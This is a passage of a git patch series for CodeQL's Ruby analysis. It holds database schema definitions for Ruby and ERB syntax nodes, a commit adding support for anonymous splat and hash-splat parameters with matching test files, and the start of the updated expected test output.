+); + +ruby_keyword_parameter_value( + unique int ruby_keyword_parameter: @ruby_keyword_parameter ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_keyword_parameter_def( + unique int id: @ruby_keyword_parameter, + int name: @ruby_token_identifier ref +); + +@ruby_keyword_pattern_key_type = @ruby_string__ | @ruby_token_hash_key_symbol + +ruby_keyword_pattern_value( + unique int ruby_keyword_pattern: @ruby_keyword_pattern ref, + unique int value: @ruby_underscore_pattern_expr ref +); + +ruby_keyword_pattern_def( + unique int id: @ruby_keyword_pattern, + int key__: @ruby_keyword_pattern_key_type ref +); + +@ruby_lambda_body_type = @ruby_block | @ruby_do_block + +ruby_lambda_parameters( + unique int ruby_lambda: @ruby_lambda ref, + unique int parameters: @ruby_lambda_parameters ref +); + +ruby_lambda_def( + unique int id: @ruby_lambda, + int body: @ruby_lambda_body_type ref +); + +@ruby_lambda_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_lambda_parameters, index] +ruby_lambda_parameters_child( + int ruby_lambda_parameters: @ruby_lambda_parameters ref, + int index: int ref, + unique int child: @ruby_lambda_parameters_child_type ref +); + +ruby_lambda_parameters_def( + unique int id: @ruby_lambda_parameters +); + +@ruby_left_assignment_list_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_left_assignment_list, index] +ruby_left_assignment_list_child( + int ruby_left_assignment_list: @ruby_left_assignment_list ref, + int index: int ref, + unique int child: @ruby_left_assignment_list_child_type ref +); + +ruby_left_assignment_list_def( + unique int id: @ruby_left_assignment_list +); + +@ruby_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_method_body( + unique int ruby_method: @ruby_method ref, + unique int body: @ruby_method_body_type ref +); + +ruby_method_parameters( + unique int ruby_method: @ruby_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_method_def( + unique int id: @ruby_method, + int name: @ruby_underscore_method_name ref +); + +@ruby_method_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_method_parameters, index] +ruby_method_parameters_child( + int ruby_method_parameters: @ruby_method_parameters ref, + int index: int ref, + unique int child: @ruby_method_parameters_child_type ref +); + +ruby_method_parameters_def( + unique int id: @ruby_method_parameters +); + +ruby_module_body( + unique int ruby_module: @ruby_module ref, + unique int body: @ruby_body_statement ref +); + +@ruby_module_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_module_def( + unique int id: @ruby_module, + int name: @ruby_module_name_type ref +); + +ruby_next_child( + unique int ruby_next: @ruby_next ref, + unique int child: @ruby_argument_list ref +); + +ruby_next_def( + unique int id: @ruby_next +); + +case @ruby_operator_assignment.operator of + 0 = @ruby_operator_assignment_percentequal +| 1 = @ruby_operator_assignment_ampersandampersandequal +| 2 = @ruby_operator_assignment_ampersandequal +| 3 = @ruby_operator_assignment_starstarequal +| 4 = @ruby_operator_assignment_starequal +| 5 = @ruby_operator_assignment_plusequal +| 6 = @ruby_operator_assignment_minusequal +| 7 = @ruby_operator_assignment_slashequal +| 8 = @ruby_operator_assignment_langlelangleequal +| 9 = @ruby_operator_assignment_ranglerangleequal +| 10 = @ruby_operator_assignment_caretequal +| 11 = @ruby_operator_assignment_pipeequal +| 12 = @ruby_operator_assignment_pipepipeequal +; + + +@ruby_operator_assignment_right_type = @ruby_rescue_modifier | @ruby_underscore_expression + +ruby_operator_assignment_def( + unique int id: @ruby_operator_assignment, + int left: @ruby_underscore_lhs ref, + int operator: int ref, + int right: @ruby_operator_assignment_right_type ref +); + +ruby_optional_parameter_def( + unique int id: @ruby_optional_parameter, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_arg ref +); + +@ruby_pair_key_type = @ruby_string__ | @ruby_token_hash_key_symbol | @ruby_underscore_arg + +ruby_pair_value( + unique int ruby_pair: @ruby_pair ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_pair_def( + unique int id: @ruby_pair, + int key__: @ruby_pair_key_type ref +); + +ruby_parenthesized_pattern_def( + unique int id: @ruby_parenthesized_pattern, + int child: @ruby_underscore_pattern_expr ref +); + +@ruby_parenthesized_statements_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_parenthesized_statements, index] +ruby_parenthesized_statements_child( + int ruby_parenthesized_statements: @ruby_parenthesized_statements ref, + int index: int ref, + unique int child: @ruby_parenthesized_statements_child_type ref +); + +ruby_parenthesized_statements_def( + unique int id: @ruby_parenthesized_statements +); + +@ruby_pattern_child_type = @ruby_splat_argument | @ruby_underscore_arg + +ruby_pattern_def( + unique int id: @ruby_pattern, + int child: @ruby_pattern_child_type ref +); + +@ruby_program_child_type = @ruby_token_empty_statement | @ruby_token_uninterpreted | @ruby_underscore_statement + +#keyset[ruby_program, index] +ruby_program_child( + int ruby_program: @ruby_program ref, + int index: int ref, + unique int child: @ruby_program_child_type ref +); + +ruby_program_def( + unique int id: @ruby_program +); + +@ruby_range_begin_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_begin( + unique int ruby_range: @ruby_range ref, + unique int begin: @ruby_range_begin_type ref +); + +@ruby_range_end_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_end( + unique int ruby_range: @ruby_range ref, + unique int end: @ruby_range_end_type ref +); + +case @ruby_range.operator of + 0 = @ruby_range_dotdot +| 1 = @ruby_range_dotdotdot +; + + +ruby_range_def( + unique int id: @ruby_range, + int operator: int ref +); + +@ruby_rational_child_type = @ruby_token_float | @ruby_token_integer + +ruby_rational_def( + unique int id: @ruby_rational, + int child: @ruby_rational_child_type ref +); + +ruby_redo_child( + unique int ruby_redo: @ruby_redo ref, + unique int child: @ruby_argument_list ref +); + +ruby_redo_def( + unique int id: @ruby_redo +); + +@ruby_regex_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_regex, index] +ruby_regex_child( + int ruby_regex: @ruby_regex ref, + int index: int ref, + unique int child: @ruby_regex_child_type ref +); + +ruby_regex_def( + unique int id: @ruby_regex +); + +ruby_rescue_body( + unique int ruby_rescue: @ruby_rescue ref, + unique int body: @ruby_then ref +); + +ruby_rescue_exceptions( + unique int ruby_rescue: @ruby_rescue ref, + unique int exceptions: @ruby_exceptions ref +); + +ruby_rescue_variable( + unique int ruby_rescue: @ruby_rescue ref, + unique int variable: @ruby_exception_variable ref +); + +ruby_rescue_def( + unique int id: @ruby_rescue +); + +@ruby_rescue_modifier_body_type = @ruby_underscore_arg | @ruby_underscore_statement + +ruby_rescue_modifier_def( + unique int id: @ruby_rescue_modifier, + int body: @ruby_rescue_modifier_body_type ref, + int handler: @ruby_underscore_expression ref +); + +ruby_rest_assignment_child( + unique int ruby_rest_assignment: @ruby_rest_assignment ref, + unique int child: @ruby_underscore_lhs ref +); + +ruby_rest_assignment_def( + unique int id: @ruby_rest_assignment +); + +ruby_retry_child( + unique int ruby_retry: @ruby_retry ref, + unique int child: @ruby_argument_list ref +); + +ruby_retry_def( + unique int id: @ruby_retry +); + +ruby_return_child( + unique int ruby_return: @ruby_return ref, + unique int child: @ruby_argument_list ref +); + +ruby_return_def( + unique int id: @ruby_return +); + +@ruby_right_assignment_list_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_right_assignment_list, index] +ruby_right_assignment_list_child( + int ruby_right_assignment_list: @ruby_right_assignment_list ref, + int index: int ref, + unique int child: @ruby_right_assignment_list_child_type ref +); + +ruby_right_assignment_list_def( + unique int id: @ruby_right_assignment_list +); + +@ruby_scope_resolution_scope_type = @ruby_underscore_pattern_constant | @ruby_underscore_primary + +ruby_scope_resolution_scope( + unique int ruby_scope_resolution: @ruby_scope_resolution ref, + unique int scope: @ruby_scope_resolution_scope_type ref +); + +ruby_scope_resolution_def( + unique int id: @ruby_scope_resolution, + int name: @ruby_token_constant ref +); + +ruby_setter_def( + unique int id: @ruby_setter, + int name: @ruby_token_identifier ref +); + +ruby_singleton_class_body( + unique int ruby_singleton_class: @ruby_singleton_class ref, + unique int body: @ruby_body_statement ref +); + +ruby_singleton_class_def( + unique int id: @ruby_singleton_class, + int value: @ruby_underscore_arg ref +); + +@ruby_singleton_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_singleton_method_body( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int body: @ruby_singleton_method_body_type ref +); + +@ruby_singleton_method_object_type = @ruby_underscore_arg | @ruby_underscore_variable + +ruby_singleton_method_parameters( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_singleton_method_def( + unique int id: @ruby_singleton_method, + int name: @ruby_underscore_method_name ref, + int object: @ruby_singleton_method_object_type ref +); + +ruby_splat_argument_child( + unique int ruby_splat_argument: @ruby_splat_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_splat_argument_def( + unique int id: @ruby_splat_argument +); + +ruby_splat_parameter_name( + unique int ruby_splat_parameter: @ruby_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_splat_parameter_def( + unique int id: @ruby_splat_parameter +); + +@ruby_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_string__, index] +ruby_string_child( + int ruby_string__: @ruby_string__ ref, + int index: int ref, + unique int child: @ruby_string_child_type ref +); + +ruby_string_def( + unique int id: @ruby_string__ +); + +#keyset[ruby_string_array, index] +ruby_string_array_child( + int ruby_string_array: @ruby_string_array ref, + int index: int ref, + unique int child: @ruby_bare_string ref +); + +ruby_string_array_def( + unique int id: @ruby_string_array +); + +@ruby_subshell_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_subshell, index] +ruby_subshell_child( + int ruby_subshell: @ruby_subshell ref, + int index: int ref, + unique int child: @ruby_subshell_child_type ref +); + +ruby_subshell_def( + unique int id: @ruby_subshell +); + +ruby_superclass_def( + unique int id: @ruby_superclass, + int child: @ruby_underscore_expression ref +); + +#keyset[ruby_symbol_array, index] +ruby_symbol_array_child( + int ruby_symbol_array: @ruby_symbol_array ref, + int index: int ref, + unique int child: @ruby_bare_symbol ref +); + +ruby_symbol_array_def( + unique int id: @ruby_symbol_array +); + +@ruby_then_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_then, index] +ruby_then_child( + int ruby_then: @ruby_then ref, + int index: int ref, + unique int child: @ruby_then_child_type ref +); + +ruby_then_def( + unique int id: @ruby_then +); + +@ruby_unary_operand_type = @ruby_parenthesized_statements | @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_unary.operator of + 0 = @ruby_unary_bang +| 1 = @ruby_unary_plus +| 2 = @ruby_unary_minus +| 3 = @ruby_unary_definedquestion +| 4 = @ruby_unary_not +| 5 = @ruby_unary_tilde +; + + +ruby_unary_def( + unique int id: @ruby_unary, + int operand: @ruby_unary_operand_type ref, + int operator: int ref +); + +#keyset[ruby_undef, index] +ruby_undef_child( + int ruby_undef: @ruby_undef ref, + int index: int ref, + unique int child: @ruby_underscore_method_name ref +); + +ruby_undef_def( + unique int id: @ruby_undef +); + +@ruby_unless_alternative_type = @ruby_else | @ruby_elsif + +ruby_unless_alternative( + unique int ruby_unless: @ruby_unless ref, + unique int alternative: @ruby_unless_alternative_type ref +); + +ruby_unless_consequence( + unique int ruby_unless: @ruby_unless ref, + unique int consequence: @ruby_then ref +); + +ruby_unless_def( + unique int id: @ruby_unless, + int condition: @ruby_underscore_statement ref +); + +ruby_unless_guard_def( + unique int id: @ruby_unless_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_unless_modifier_def( + unique int id: @ruby_unless_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_until_def( + unique int id: @ruby_until, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_until_modifier_def( + unique int id: @ruby_until_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +@ruby_variable_reference_pattern_name_type = @ruby_token_identifier | @ruby_underscore_nonlocal_variable + +ruby_variable_reference_pattern_def( + unique int id: @ruby_variable_reference_pattern, + int name: @ruby_variable_reference_pattern_name_type ref +); + +ruby_when_body( + unique int ruby_when: @ruby_when ref, + unique int body: @ruby_then ref +); + +#keyset[ruby_when, index] +ruby_when_pattern( + int ruby_when: @ruby_when ref, + int index: int ref, + unique int pattern: @ruby_pattern ref +); + +ruby_when_def( + unique int id: @ruby_when +); + +ruby_while_def( + unique int id: @ruby_while, + int body: @ruby_do ref, + int condition: @ruby_underscore_statement ref +); + +ruby_while_modifier_def( + unique int id: @ruby_while_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_yield_child( + unique int ruby_yield: @ruby_yield ref, + unique int child: @ruby_argument_list ref +); + +ruby_yield_def( + unique int id: @ruby_yield +); + +ruby_tokeninfo( + unique int id: @ruby_token, + int kind: int ref, + string value: string ref +); + +case @ruby_token.kind of + 0 = @ruby_reserved_word +| 1 = @ruby_token_character +| 2 = @ruby_token_class_variable +| 3 = @ruby_token_comment +| 4 = @ruby_token_constant +| 5 = @ruby_token_empty_statement +| 6 = @ruby_token_encoding +| 7 = @ruby_token_escape_sequence +| 8 = @ruby_token_false +| 9 = @ruby_token_file +| 10 = @ruby_token_float +| 11 = @ruby_token_forward_argument +| 12 = @ruby_token_forward_parameter +| 13 = @ruby_token_global_variable +| 14 = @ruby_token_hash_key_symbol +| 15 = @ruby_token_hash_splat_nil +| 16 = @ruby_token_heredoc_beginning +| 17 = @ruby_token_heredoc_content +| 18 = @ruby_token_heredoc_end +| 19 = @ruby_token_identifier +| 20 = @ruby_token_instance_variable +| 21 = @ruby_token_integer +| 22 = @ruby_token_line +| 23 = @ruby_token_nil +| 24 = @ruby_token_operator +| 25 = @ruby_token_self +| 26 = @ruby_token_simple_symbol +| 27 = @ruby_token_string_content +| 28 = @ruby_token_super +| 29 = @ruby_token_true +| 30 = @ruby_token_uninterpreted +; + + +@ruby_ast_node = @ruby_alias | @ruby_alternative_pattern | @ruby_argument_list | @ruby_array | @ruby_array_pattern | @ruby_as_pattern | @ruby_assignment | @ruby_bare_string | @ruby_bare_symbol | @ruby_begin | @ruby_begin_block | @ruby_binary | @ruby_block | @ruby_block_argument | @ruby_block_body | @ruby_block_parameter | @ruby_block_parameters | @ruby_body_statement | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_complex | @ruby_conditional | @ruby_delimited_symbol | @ruby_destructured_left_assignment | @ruby_destructured_parameter | @ruby_do | @ruby_do_block | @ruby_element_reference | @ruby_else | @ruby_elsif | @ruby_end_block | @ruby_ensure | @ruby_exception_variable | @ruby_exceptions | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_for | @ruby_hash | @ruby_hash_pattern | @ruby_hash_splat_argument | @ruby_hash_splat_parameter | @ruby_heredoc_body | @ruby_if | @ruby_if_guard | @ruby_if_modifier | @ruby_in | @ruby_in_clause | @ruby_interpolation | @ruby_keyword_parameter | @ruby_keyword_pattern | @ruby_lambda | @ruby_lambda_parameters | @ruby_left_assignment_list | @ruby_method | @ruby_method_parameters | @ruby_module | @ruby_next | @ruby_operator_assignment | @ruby_optional_parameter | @ruby_pair | @ruby_parenthesized_pattern | @ruby_parenthesized_statements | @ruby_pattern | @ruby_program | @ruby_range | @ruby_rational | @ruby_redo | @ruby_regex | @ruby_rescue | @ruby_rescue_modifier | @ruby_rest_assignment | @ruby_retry | @ruby_return | @ruby_right_assignment_list | @ruby_scope_resolution | @ruby_setter | @ruby_singleton_class | @ruby_singleton_method | @ruby_splat_argument | @ruby_splat_parameter | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_superclass | @ruby_symbol_array | @ruby_then | @ruby_token | @ruby_unary | @ruby_undef | @ruby_unless | @ruby_unless_guard | @ruby_unless_modifier | @ruby_until | @ruby_until_modifier | @ruby_variable_reference_pattern | @ruby_when | @ruby_while | @ruby_while_modifier | @ruby_yield + +@ruby_ast_node_parent = @file | @ruby_ast_node + +#keyset[parent, parent_index] +ruby_ast_node_info( + unique int node: @ruby_ast_node ref, + int parent: @ruby_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + +erb_comment_directive_child( + unique int erb_comment_directive: @erb_comment_directive ref, + unique int child: @erb_token_comment ref +); + +erb_comment_directive_def( + unique int id: @erb_comment_directive +); + +erb_directive_child( + unique int erb_directive: @erb_directive ref, + unique int child: @erb_token_code ref +); + +erb_directive_def( + unique int id: @erb_directive +); + +erb_graphql_directive_child( + unique int erb_graphql_directive: @erb_graphql_directive ref, + unique int child: @erb_token_code ref +); + +erb_graphql_directive_def( + unique int id: @erb_graphql_directive +); + +erb_output_directive_child( + unique int erb_output_directive: @erb_output_directive ref, + unique int child: @erb_token_code ref +); + +erb_output_directive_def( + unique int id: @erb_output_directive +); + +@erb_template_child_type = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_token_content + +#keyset[erb_template, index] +erb_template_child( + int erb_template: @erb_template ref, + int index: int ref, + unique int child: @erb_template_child_type ref +); + +erb_template_def( + unique int id: @erb_template +); + +erb_tokeninfo( + unique int id: @erb_token, + int kind: int ref, + string value: string ref +); + +case @erb_token.kind of + 0 = @erb_reserved_word +| 1 = @erb_token_code +| 2 = @erb_token_comment +| 3 = @erb_token_content +; + + +@erb_ast_node = @erb_comment_directive | @erb_directive | @erb_graphql_directive | @erb_output_directive | @erb_template | @erb_token + +@erb_ast_node_parent = @erb_ast_node | @file + +#keyset[parent, parent_index] +erb_ast_node_info( + unique int node: @erb_ast_node ref, + int parent: @erb_ast_node_parent ref, + int parent_index: int ref, + int loc: @location ref +); + diff --git a/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/upgrade.properties b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/upgrade.properties new file mode 100644 index 00000000000..7ee0710bb3e --- /dev/null +++ b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/upgrade.properties @@ -0,0 +1,6 @@ +description: Update grammar +compatibility: full +ruby_splat_argument_def.rel: reorder ruby_splat_argument_def.rel ( int id, int child) id +ruby_splat_argument_child.rel: reorder ruby_splat_argument_def.rel ( int id, int child) id child +ruby_hash_splat_argument_def.rel: reorder ruby_hash_splat_argument_def.rel ( int id, int child) id +ruby_hash_splat_argument_child.rel: reorder ruby_hash_splat_argument_def.rel ( int id, int child) id child From c4ec674057b9ffa357bc30491e083026028c2bad Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Tue, 10 Jan 2023 12:52:45 +0100 Subject: [PATCH 266/381] Ruby: support anonymous (hash)splat parameters/arguments --- ruby/ql/lib/codeql/ruby/ast/Parameter.qll | 10 +++- ruby/ql/lib/codeql/ruby/ast/Variable.qll | 4 +- .../codeql/ruby/ast/internal/Operation.qll | 10 +++- .../codeql/ruby/ast/internal/Synthesis.qll | 48 ++++++++++++------- ruby/ql/test/library-tests/ast/calls/calls.rb | 2 + .../test/library-tests/ast/params/params.rb | 10 ++++ 6 files changed, 62 insertions(+), 22 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/ast/Parameter.qll b/ruby/ql/lib/codeql/ruby/ast/Parameter.qll index 3c1d5275cc7..f67e8566cfc 100644 --- a/ruby/ql/lib/codeql/ruby/ast/Parameter.qll +++ b/ruby/ql/lib/codeql/ruby/ast/Parameter.qll @@ -181,7 +181,10 @@ class HashSplatParameter extends NamedParameter, THashSplatParameter { final override string getAPrimaryQlClass() { result = "HashSplatParameter" } - final override LocalVariable getVariable() { result = TLocalVariableReal(_, _, g.getName()) } + final override LocalVariable getVariable() { + result = TLocalVariableReal(_, _, g.getName()) or + result = TLocalVariableSynth(this, 0) + } final override string toString() { result = "**" + this.getName() @@ -307,7 +310,10 @@ class SplatParameter extends NamedParameter, TSplatParameter { final override string getAPrimaryQlClass() { result = "SplatParameter" } - final override LocalVariable getVariable() { result = TLocalVariableReal(_, _, g.getName()) } + final override LocalVariable getVariable() { + result = TLocalVariableReal(_, _, g.getName()) or + result = TLocalVariableSynth(this, 0) + } final override string toString() { result = "*" + this.getName() diff --git a/ruby/ql/lib/codeql/ruby/ast/Variable.qll b/ruby/ql/lib/codeql/ruby/ast/Variable.qll index 9301575ac94..fa00cfb4cc7 100644 --- a/ruby/ql/lib/codeql/ruby/ast/Variable.qll +++ b/ruby/ql/lib/codeql/ruby/ast/Variable.qll @@ -36,7 +36,7 @@ class LocalVariable extends Variable, TLocalVariable { /** Gets the access where this local variable is first introduced. */ VariableAccess getDefiningAccess() { result = this.(LocalVariableReal).getDefiningAccessImpl() or - synthChild(any(BlockParameter p | this = p.getVariable()), 0, result) + synthChild(any(NamedParameter p | this = p.getVariable()), 0, result) } /** @@ -120,7 +120,7 @@ class VariableAccess extends Expr instanceof VariableAccessImpl { or this = any(HashPattern p).getValue(_) or - synthChild(any(BlockParameter p), 0, this) + synthChild(any(NamedParameter p), 0, this) } } diff --git a/ruby/ql/lib/codeql/ruby/ast/internal/Operation.qll b/ruby/ql/lib/codeql/ruby/ast/internal/Operation.qll index a63da1768cf..3f08a8b7869 100644 --- a/ruby/ql/lib/codeql/ruby/ast/internal/Operation.qll +++ b/ruby/ql/lib/codeql/ruby/ast/internal/Operation.qll @@ -42,7 +42,10 @@ class SplatExprReal extends UnaryOperationImpl, TSplatExprReal { final override string getOperatorImpl() { result = "*" } - final override Expr getOperandImpl() { toGenerated(result) = g.getChild() } + final override Expr getOperandImpl() { + toGenerated(result) = g.getChild() or + synthChild(this, 0, result) + } } class SplatExprSynth extends UnaryOperationImpl, TSplatExprSynth { @@ -56,7 +59,10 @@ class HashSplatExprImpl extends UnaryOperationImpl, THashSplatExpr { HashSplatExprImpl() { this = THashSplatExpr(g) } - final override Expr getOperandImpl() { toGenerated(result) = g.getChild() } + final override Expr getOperandImpl() { + toGenerated(result) = g.getChild() or + synthChild(this, 0, result) + } final override string getOperatorImpl() { result = "**" } } diff --git a/ruby/ql/lib/codeql/ruby/ast/internal/Synthesis.qll b/ruby/ql/lib/codeql/ruby/ast/internal/Synthesis.qll index 43f89740908..832c12af6fa 100644 --- a/ruby/ql/lib/codeql/ruby/ast/internal/Synthesis.qll +++ b/ruby/ql/lib/codeql/ruby/ast/internal/Synthesis.qll @@ -1317,46 +1317,62 @@ private module ImplicitHashValueSynthesis { /** * ```rb - * def foo(&) - * bar(&) + * def foo(*, **, &) + * bar(*, **, &) * end * ``` * desugars to, * ```rb - * def foo(&__synth_0) - * bar(&__synth_0) + * def foo(*__synth_0, **__synth_1, &__synth_2) + * bar(*__synth_0, **__synth_1, &__synth_2) * end * ``` */ -private module AnonymousBlockParameterSynth { - private BlockParameter anonymousBlockParameter() { +private module AnonymousParameterSynth { + private class AnonymousParameter = TBlockParameter or THashSplatParameter or TSplatParameter; + + private class AnonymousArgument = TBlockArgument or THashSplatExpr or TSplatExpr; + + private AnonymousParameter anonymousParameter() { exists(Ruby::BlockParameter p | not exists(p.getName()) and toGenerated(result) = p) + or + exists(Ruby::SplatParameter p | not exists(p.getName()) and toGenerated(result) = p) + or + exists(Ruby::HashSplatParameter p | not exists(p.getName()) and toGenerated(result) = p) } - private BlockArgument anonymousBlockArgument() { + private AnonymousArgument anonymousArgument() { exists(Ruby::BlockArgument p | not exists(p.getChild()) and toGenerated(result) = p) + or + exists(Ruby::SplatArgument p | not exists(p.getChild()) and toGenerated(result) = p) + or + exists(Ruby::HashSplatArgument p | not exists(p.getChild()) and toGenerated(result) = p) } - private class AnonymousBlockParameterSynthesis extends Synthesis { + private class AnonymousParameterSynthesis extends Synthesis { final override predicate child(AstNode parent, int i, Child child) { i = 0 and - parent = anonymousBlockParameter() and + parent = anonymousParameter() and child = SynthChild(LocalVariableAccessSynthKind(TLocalVariableSynth(parent, 0))) } - final override predicate localVariable(AstNode n, int i) { - n = anonymousBlockParameter() and i = 0 - } + final override predicate localVariable(AstNode n, int i) { n = anonymousParameter() and i = 0 } } - private class AnonymousBlockArgumentSynthesis extends Synthesis { + private class AnonymousArgumentSynthesis extends Synthesis { final override predicate child(AstNode parent, int i, Child child) { i = 0 and - parent = anonymousBlockArgument() and - exists(BlockParameter param | - param = anonymousBlockParameter() and + parent = anonymousArgument() and + exists(AnonymousParameter param | + param = anonymousParameter() and scopeOf(toGenerated(parent)).getEnclosingMethod() = scopeOf(toGenerated(param)) and child = SynthChild(LocalVariableAccessSynthKind(TLocalVariableSynth(param, 0))) + | + param instanceof TBlockParameter and parent instanceof TBlockArgument + or + param instanceof TSplatParameter and parent instanceof TSplatExpr + or + param instanceof THashSplatParameter and parent instanceof THashSplatExpr ) } } diff --git a/ruby/ql/test/library-tests/ast/calls/calls.rb b/ruby/ql/test/library-tests/ast/calls/calls.rb index 361b245745f..575f5475ae0 100644 --- a/ruby/ql/test/library-tests/ast/calls/calls.rb +++ b/ruby/ql/test/library-tests/ast/calls/calls.rb @@ -269,10 +269,12 @@ foo(&) # splat argument foo(*bar) foo(*X::bar) +foo(*) # hash-splat argument foo(**bar) foo(**X::bar) +foo(**) # the value in a keyword argument foo(blah: bar) diff --git a/ruby/ql/test/library-tests/ast/params/params.rb b/ruby/ql/test/library-tests/ast/params/params.rb index c406d01009a..c29d3739e2e 100644 --- a/ruby/ql/test/library-tests/ast/params/params.rb +++ b/ruby/ql/test/library-tests/ast/params/params.rb @@ -84,3 +84,13 @@ def anonymous_block_parameter(array, &) end run_block { |x; y, z | puts x } + +# Anonymous splat parameter +def anonymous_splat_parameter(array, *) + array.concat(*) +end + +# Anonymous hash splat parameter +def anonymous_hash_splat_parameter(hash, **) + hash.merge(**) +end From 46063c7d048723f57e3959f0b3f501cdb86e90a4 Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Tue, 10 Jan 2023 13:38:59 +0100 Subject: [PATCH 267/381] Ruby: update expected output --- ruby/ql/test/library-tests/ast/Ast.expected | 496 ++++---- .../library-tests/ast/AstDesugar.expected | 444 ++++---- .../library-tests/ast/TreeSitter.expected | 1006 +++++++++-------- .../test/library-tests/ast/ValueText.expected | 276 ++--- .../ast/calls/arguments.expected | 38 +- .../library-tests/ast/calls/calls.expected | 468 ++++---- .../library-tests/ast/params/params.expected | 10 + .../controlflow/graph/Cfg.expected | 8 +- .../diagnostics/ExtractionErrors.expected | 3 +- 9 files changed, 1423 insertions(+), 1326 deletions(-) diff --git a/ruby/ql/test/library-tests/ast/Ast.expected b/ruby/ql/test/library-tests/ast/Ast.expected index 044c92b8ac3..d5b2c946817 100644 --- a/ruby/ql/test/library-tests/ast/Ast.expected +++ b/ruby/ql/test/library-tests/ast/Ast.expected @@ -470,293 +470,299 @@ calls/calls.rb: # 271| getArgument: [SplatExpr] * ... # 271| getAnOperand/getOperand/getReceiver: [MethodCall] call to bar # 271| getReceiver: [ConstantReadAccess] X -# 274| getStmt: [MethodCall] call to foo -# 274| getReceiver: [SelfVariableAccess] self -# 274| getArgument: [HashSplatExpr] ** ... -# 274| getAnOperand/getOperand/getReceiver: [MethodCall] call to bar -# 274| getReceiver: [SelfVariableAccess] self +# 272| getStmt: [MethodCall] call to foo +# 272| getReceiver: [SelfVariableAccess] self +# 272| getArgument: [SplatExpr] * ... # 275| getStmt: [MethodCall] call to foo # 275| getReceiver: [SelfVariableAccess] self # 275| getArgument: [HashSplatExpr] ** ... # 275| getAnOperand/getOperand/getReceiver: [MethodCall] call to bar -# 275| getReceiver: [ConstantReadAccess] X -# 278| getStmt: [MethodCall] call to foo -# 278| getReceiver: [SelfVariableAccess] self -# 278| getArgument: [Pair] Pair -# 278| getKey: [SymbolLiteral] :blah -# 278| getComponent: [StringTextComponent] blah -# 278| getValue: [MethodCall] call to bar -# 278| getReceiver: [SelfVariableAccess] self -# 279| getStmt: [MethodCall] call to foo -# 279| getReceiver: [SelfVariableAccess] self -# 279| getArgument: [Pair] Pair -# 279| getKey: [SymbolLiteral] :blah -# 279| getComponent: [StringTextComponent] blah -# 279| getValue: [MethodCall] call to bar -# 279| getReceiver: [ConstantReadAccess] X -# 284| getStmt: [ClassDeclaration] MyClass -# 285| getStmt: [Method] my_method -# 286| getStmt: [SuperCall] super call to my_method -# 287| getStmt: [SuperCall] super call to my_method +# 275| getReceiver: [SelfVariableAccess] self +# 276| getStmt: [MethodCall] call to foo +# 276| getReceiver: [SelfVariableAccess] self +# 276| getArgument: [HashSplatExpr] ** ... +# 276| getAnOperand/getOperand/getReceiver: [MethodCall] call to bar +# 276| getReceiver: [ConstantReadAccess] X +# 277| getStmt: [MethodCall] call to foo +# 277| getReceiver: [SelfVariableAccess] self +# 277| getArgument: [HashSplatExpr] ** ... +# 280| getStmt: [MethodCall] call to foo +# 280| getReceiver: [SelfVariableAccess] self +# 280| getArgument: [Pair] Pair +# 280| getKey: [SymbolLiteral] :blah +# 280| getComponent: [StringTextComponent] blah +# 280| getValue: [MethodCall] call to bar +# 280| getReceiver: [SelfVariableAccess] self +# 281| getStmt: [MethodCall] call to foo +# 281| getReceiver: [SelfVariableAccess] self +# 281| getArgument: [Pair] Pair +# 281| getKey: [SymbolLiteral] :blah +# 281| getComponent: [StringTextComponent] blah +# 281| getValue: [MethodCall] call to bar +# 